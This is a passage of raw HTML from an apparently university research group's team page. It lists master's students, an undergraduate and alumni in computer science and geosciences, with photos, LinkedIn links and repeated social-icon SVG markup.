313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg\" class=\"wp-image-1050 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c104\" class=\"style-855 style-local-182-c104 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c105-outer\">\n            <div data-colibri-id=\"182-c105\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c105 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c106\" class=\"d-block style-854 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg\" class=\"wp-image-1094 style-854-image style-local-182-c106-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c106-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-global-transition-all h-heading style-850 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c107\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-851 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"h-text h-text-component style-902 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c110-outer\">\n            <div data-colibri-id=\"182-c110\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c110 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c111\" class=\"d-block style-854 style-local-182-c111 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg\" class=\"wp-image-874 style-854-image style-local-182-c111-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c111-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c112\" class=\"h-global-transition-all h-heading style-850 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c112\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-text h-text-component style-851 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Master\'s student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-902 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"style-855 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/11/bayo-e1695781168350.jpeg\" class=\"wp-image-1369 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Master\'s student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c125\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c125 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c132\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c132 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c133-outer\">\n            <div data-colibri-id=\"182-c133\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c133 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c134\" class=\"h-global-transition-all h-heading style-844 style-local-182-c134 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c134\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c126\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c126 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c127-outer\">\n            <div data-colibri-id=\"182-c127\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c127 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c128\" class=\"d-block style-831 style-local-182-c128 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c128-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c128-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c129\" class=\"h-global-transition-all h-heading style-832 style-local-182-c129 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c129\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c130\" class=\"h-text h-text-component style-833 style-local-182-c130 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c131\" class=\"style-835 style-local-182-c131 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c135\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c135 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c186\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c186 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c187-outer\">\n            <div data-colibri-id=\"182-c187\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c187 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c188\" class=\"h-global-transition-all h-heading style-926 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c188\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c136\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c136 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c137-outer\">\n            <div data-colibri-id=\"182-c137\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c137 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c138\" class=\"d-block style-913 style-local-182-c138 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg\" class=\"wp-image-1595 style-913-image style-local-182-c138-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c138-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c139\" class=\"h-global-transition-all h-heading style-914 style-local-182-c139 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c139\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c140\" class=\"h-text h-text-component style-915 style-local-182-c140 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c141\" class=\"style-917 style-local-182-c141 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c142-outer\">\n            <div data-colibri-id=\"182-c142\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c142 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c143\" class=\"d-block style-918 style-local-182-c143 position-relative h-element\">\n                  